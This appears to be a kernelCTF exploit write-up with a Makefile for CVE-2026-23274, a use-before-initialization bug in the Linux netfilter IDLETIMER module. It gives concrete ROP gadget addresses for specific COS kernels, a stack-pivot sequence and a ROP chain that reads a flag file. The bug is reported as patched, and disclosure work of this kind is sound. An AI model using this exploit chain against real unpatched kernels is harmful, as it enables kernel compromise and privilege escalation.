**pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md**

# **Vulnerability**

## Summary
In `net/netfilter/xt_IDLETIMER.c`, when a label is first created by revision 1 with `XT_IDLETIMER_ALARM` enabled and is later reused from revision 0, the kernel can invoke `mod_timer()` on uninitialized memory. This results in a Use-Before-Initialization (UBI) condition and can subsequently lead to control-flow hijacking (CFH) if the uninitialized memory is attacker-controlled.

Specifically, rev0 `idletimer_tg_checkentry()` reuses an existing object by label and unconditionally does `mod_timer(&info->timer->timer, ...)`. rev1 can create an object with `timer_type = XT_IDLETIMER_ALARM`; in that case `idletimer_tg_create_v1()` initializes the alarm backend and never calls `timer_setup()` for `info->timer->timer`. So if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a `struct timer_list` that was never initialized.

## **Vulnerability Analysis**
This bug was introduced in Linux kernel v5.7-rc1. Commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") added the rev1 entry point `idletimer_tg_checkentry_v1()` together with a type-confusion check:

```c
	if (info->timer->timer_type != info->timer_type) {
		pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n");
		mutex_unlock(&list_mutex);
		return -EINVAL;
	}
```

However, it did not add the same check to rev0 `idletimer_tg_checkentry()`. So the bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but **not** the other way around.


In the newly added `idletimer_tg_create_v1()`, if `timer_type & XT_IDLETIMER_ALARM`, the function only calls `alarm_init()` and `alarm_start_relative()`, and never does `timer_setup()` for `info->timer->timer`:

```c
	if (info->timer->timer_type & XT_IDLETIMER_ALARM) {
		ktime_t tout;

		alarm_init(&info->timer->alarm, ALARM_BOOTTIME,
			   idletimer_tg_alarmproc);
		info->timer->alarm.data = info->timer;
		tout = ktime_set(info->timeout, 0);
		alarm_start_relative(&info->timer->alarm, tout);
	} else {
		/* skipped when timer_type is ALARM: info->timer->timer stays uninitialized */
		timer_setup(&info->timer->timer, idletimer_tg_expired, 0);
		mod_timer(&info->timer->timer,
			  msecs_to_jiffies(info->timeout * 1000) + jiffies);
	}
```

Later, rev0's `idletimer_tg_checkentry()`, which lacks the type check, can fetch the object created by rev1 (since `__idletimer_tg_find_by_label()` walks the same global `idletimer_tg_list`) and then unconditionally call `mod_timer(&info->timer->timer, ...)`, triggering the Use-Before-Initialization bug.

```c
	info->timer = __idletimer_tg_find_by_label(info->label);
	if (info->timer) {
		info->timer->refcnt++;
		mod_timer(&info->timer->timer,
			  msecs_to_jiffies(info->timeout * 1000) + jiffies); /* UBI to CFH */
		pr_debug("increased refcnt of timer %s to %u\n",
			 info->label, info->timer->refcnt);
	}
```

The bug was patched in v7.0-rc4 by our team after the kernelCTF submission.

# Exploit

## Exploit Summary
- **Prefetch** → Kernel base address leak
- **CVE-2026-23274** → UBI in `mod_timer()`; leaving a payload in kmalloc-256 escalates this to CFH directly
- **NPerm** → Place fake stack for ROP chain
- **ROP** → After CFH, pivot to the stack and execute ROP *in softirq* to read the flag directly.

## Exploit Details

### From UBI to CFH
Since `mod_timer()` is called with `info->timer->timer` uninitialized, and the containing `struct idletimer_tg` is allocated by `kmalloc(sizeof(*info->timer), GFP_KERNEL)`, we can control the content of the uninitialized `struct timer_list` by controlling the content of a freed kmalloc-256 chunk.

In rev1, the `alarm` field in `struct idletimer_tg` is initialized but not the `timer` field.

The uninitialized `timer_list timer` is then used by `mod_timer()`. It contains the callback function pointer `function`:
```c
struct idletimer_tg {
	struct list_head entry;
	struct alarm alarm;
	struct timer_list timer;
	struct work_struct work;

	struct kobject *kobj;
	struct device_attribute attr;

	unsigned int refcnt;
	u8 timer_type;
};

struct timer_list {
	struct hlist_node entry;
	unsigned long expires;
	void (*function)(struct timer_list *);
	u32 flags;
};
```

In `__mod_timer()`:

```c
int mod_timer(struct timer_list *timer, unsigned long expires)
{
	return __mod_timer(timer, expires, 0);
}

static inline int
__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options)
{
	unsigned int idx = UINT_MAX;
	...
	debug_assert_init(timer);

	if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {
		... /* We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false. */
	} else {
		base = lock_timer_base(timer, &flags); /* Set timer->flags to 0 to avoid an infinite loop here. */
		if (!timer->function)
			goto out_unlock;
		forward_timer_base(base);
	}
	...
	debug_timer_activate(timer);

	timer->expires = expires;

	if (idx != UINT_MAX && clk == base->clk) /* Not taken */
		enqueue_timer(base, timer, idx, bucket_expiry);
	else
		internal_add_timer(base, timer); /* Will give us CFH later by setting timer->function */

out_unlock:
	raw_spin_unlock_irqrestore(&base->lock, flags);
	return ret;
}
```

To pass the `timer_pending()` check, we simply need to set `entry.pprev` to 0:
```c
struct hlist_node {
	struct hlist_node *next, **pprev;
};

static inline int timer_pending(const struct timer_list * timer)
{
	return !hlist_unhashed_lockless(&timer->entry);
}

static inline int hlist_unhashed_lockless(const struct hlist_node *h)
{
	return !READ_ONCE(h->pprev);
}
```

We also set `timer->flags` to 0 to avoid an infinite loop in `lock_timer_base()`:
```c
static struct timer_base *lock_timer_base(struct timer_list *timer,
					  unsigned long *flags)
	__acquires(timer->base->lock)
{
	for (;;) {
		struct timer_base *base;
		u32 tf;

		tf = READ_ONCE(timer->flags);

		if (!(tf & TIMER_MIGRATING)) { /* must enter this branch to avoid an infinite loop */
			base = get_timer_base(tf);
			raw_spin_lock_irqsave(&base->lock, *flags);
			if (timer->flags == tf)
				return base;
			raw_spin_unlock_irqrestore(&base->lock, *flags);
		}
		cpu_relax();
	}
}
```
Then, after 1 second, our evil `timer_list` fires in softirq context and we get an arbitrary call `arb_function(EVIL_TIMER_LIST)`.

### Stack Pivot after CFH
> We discuss why we did not use Ret2BPFJIT in the "Additional Notes" section.

Since the UBI `timer_list` is rewritten inside `__mod_timer()`, we can only directly control the `function` pointer, not its arguments.

At that point, `RDI` and `R13` point to the overwritten `timer_list`, which is part of an `idletimer_tg` in kmalloc-256. So if we spray some bytes with `user_key_payload` in the adjacent chunk, we can control roughly `{RDI, R13}+[0x90-0x170]` (or the negative offset) as our payload.

> (We failed to use `builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]);` in libxdk, so we turned to our own gadgets.)

So we used the following gadgets, which exist in both `cos-113-18244.582.2` and `cos-113-18244.582.40`.

The first-stage gadget controls `RDI` and `RIP` at the same time. To store the fake stack frame, we use `NPerm` from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a known address.

As we will run an extremely long ROP chain, we still need NPerm to fake a larger stack frame, even though `cpu_entry_area` is not randomized before Linux 6.2.

The second gadget then controls `RDX` and `RIP` at the same time, and also sets `RBX` to a valid address so the final stack-pivot gadget won't crash.
At this point, `RDX == RDI ==` the address of the NPerm fake stack frame.

Finally, the third gadget loads `RSP` from `RDX` and begins our ROP execution.
```c
// --- initial stack pivot gadgets ---
// In short, the stack pivot is:
// 1. control PC; [rdi/r13 + 0x90] is a controllable user_key_payload range.
// 2. control PC and rdx, the rbx = rdi is a controllable nperm range.
// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash.

size_t timer_stage1_callback = 0xffffffff81313849;
// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax;
// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?
// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time
// rdi and rip are fetched from the next slot; currently we use user_key_payload to place pointers there


size_t nperm_stage1_dispatch = 0xffffffff810643b9;
// nperm_stage1_dispatch:
// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a];
// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax;
// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax;
// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget).
// This also sets rbx to a valid address so the stack pivoting gadget won't crash.

size_t nperm_stack_pivot = 0xffffffff81db2b0f;
// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
// This is the final stack pivot
```

### ROP to read the flag
> We discuss why we did not use `core_pattern` in the "Additional Notes" section.

There are several issues to solve when ROPing in softirq context; rather than address each of them, we decided to use one long ROP chain to do everything we want, since `NPerm` allows us to place up to **512\*8** bytes of payload.

Our ROP then does the following to read the flag directly and print it to the kernel log:

- Prepare a fake `work_struct` in a stable writable kernel region. This object is loaded by `rpc_prepare_task+5` as a second controlled object and transfers control into a second pivot sequence. This lets us leave the timer softirq path as early as possible and move the final logic into process context.

- We use another controlled region (written via the ROP's arbitrary write to a kernel RW address) that holds both the pivot metadata and the final ROP stack. The metadata provides the `pop rsp` target used by the indirect branch from the fake work item. The chain then writes `/flag`, a printk format string readable at a low loglevel, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs `filp_open`, `kernel_read`, and finally `_printk` to emit the flag. **We did NOT use the arbitrary write to set `dmesg_restrict` to 0, but since we are doing ROP we could easily add that if needed.**

- The exploit then queues the fake work item onto CPU0 and stops the current CPU, so that the queued kworker can run the open/read/printk sequence from process context.

The queueing step is necessary because direct VFS activity from timer softirq context is fragile.

Here is the **equivalent** of our ROP chain in C-like pseudocode:
```c
struct fake_work_item {
	struct work_struct work;
	struct fake_rpc_dispatch {
		void *stage2_base;
		void *dispatch_target_slot;
	} dispatch;
};

struct flag_read_context {
	char path[16];
	char fmt[16];
	loff_t pos;
	char buf[0x80];
};

static void stage2_behavior(struct flag_read_context *ctx)
{
	struct file *fp;

	fp = filp_open(ctx->path, O_NOATIME, 0);
	kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos);
	_printk(ctx->fmt, ctx->buf);
	for (;;)
		cpu_relax();
}

static void semantic_rop_behavior(void *work_base, void *pivot_base)
{
	struct flag_read_context *ctx = pivot_base + 0x98;

	/* prepare stage2 context */
	strcpy(ctx->path, "/flag");
	strcpy(ctx->fmt, "\001%s\n"); /* make it readable even at a very low console loglevel */
	ctx->pos = 0;
	memset(ctx->buf, 0, sizeof(ctx->buf));

	/* stage1 behavior: prepare fake work */
	struct fake_work_item *item = work_base; /* any rw kernel address */
	item->work.data = WORK_STRUCT_PENDING_BITS;
	item->work.entry.next = &item->work.entry;
	item->work.entry.prev = &item->work.entry;
	item->work.func = (work_func_t)rpc_prepare_task_plus_5;
	item->dispatch.stage2_base = pivot_base;
	item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66];
	*(void **)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret;

	queue_work_on(0, system_wq, &item->work);
	stop_this_cpu();
	/*
	 * The real exploit forges enough metadata so that rpc_prepare_task+5
	 * pivots into a stack whose effect is equivalent to calling
	 * stage2_behavior(ctx) from kworker process context.
	 */
}
```

The full ROP can be found in the `exploit.c` file.

Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context.

## Additional Notes

### Why not use Ret2BPFJIT
Even though cBPF JIT hardening (`bpf_jit_harden`) is now enabled by default in kernelCTF, attackers can still spray a "kernel one gadget" with unpoisoned instructions and gain root, as in the [CVE-2025-21700 exploit](https://github.com/google/security-research/blob/bc107b0437c09e3b430948a60ab29f65338e4fff/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md).

However, their 100% success-rate solution seems to rely on certain registers pointing to a valid address (as a side effect of their NOP sled).
Those register constraints are not satisfied in our case, and we did not try to remove them or find an alternative NOP sled, so the "kernel one gadget" approach does not work for us.

### Why use ROP to read the flag
As our corrupted `timer_list` callback runs in softirq context, we cannot use the usual *COMMIT_CREDS_RETURN_USER* ROP to gain a root shell, nor tricks like *[telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/)*.

For the common LPE and container escape from `core_pattern`, we also did not successfully trigger the usermode helper because:
- When we do the stack pivot, we overwrite some callee-saved registers that would be needed to return from softirq properly (mainly for unlocking and some other cleanup). So we naively halt the core by doing `msleep` in softirq context, since we have 2 cores to waste.
- The core dump queues the usermode helper if `core_pattern[0] == '|'` and then waits for the dumped process group to exit. So it always queues the actual `call_usermodehelper(OUR_LPE_PAYLOAD)` request instead of executing it directly.
- In our case, the queued request always went to the halted core. As a result, we could see our payload being queued repeatedly but never executed.

Thus, we moved to manually queue a readflag work for another core before we halt the first core.
It turned out to be a relatively long ROP chain (found by ropbot), and several of its gadgets cannot be generated by the current libxdk.

---

**pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md**

# Vulnerability Details

- **Requirements**:
- **Capabilities**: `CAP_NET_ADMIN`
- **Kernel configuration**: `CONFIG_NETFILTER=y, CONFIG_NETFILTER_XTABLES=y, CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y, CONFIG_IP_NF_IPTABLES=y`
- **User namespaces required**: Yes
- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=68983a354a655c35d3fb204489d383a2a051fda7
- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf
- **Affected Version**: `v5.7-rc1 - v7.0-rc3`
- **Affected Component**: `net/netfilter: xt_IDLETIMER`
- **Syscall to disable**: `unshare`
- **Cause**: Use-Before-Initialization
- **Description**: A Use-Before-Initialization vulnerability was discovered in the Linux kernel's netfilter subsystem. When a label is first created by revision 1 with XT_IDLETIMER_ALARM and later reused from revision 0, the kernel can invoke mod_timer() on uninitialized memory, leading to a Use-Before-Initialization condition.

---

**Makefile**

CC := g++
CPPFLAGS := -Ikernel-research/libxdk/include
CFLAGS := -static
LDFLAGS := -Lkernel-research/libxdk/lib
LDLIBS := -lkernelXDK

TARGETS := exploit exploit_debug
SRC := exploit.c

.PHONY: all prerequisites run clean

all: prerequisites exploit

prerequisites: target_db.kxdb kernel-research/libxdk/lib/libkernelXDK.a

target_db.kxdb:
	wget -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

kernel-research:
	git clone --depth 1 https://github.com/google/kernel-research.git $@

kernel-research/libxdk/lib/libkernelXDK.a: | kernel-research
	cd kernel-research/libxdk && ./build.sh

exploit: $(SRC)
	$(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS)

exploit_debug: CFLAGS += -g
exploit_debug: $(SRC)
	$(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS)

run: exploit
	./$<

clean:
	rm -rf $(TARGETS) target_db.kxdb kernel-research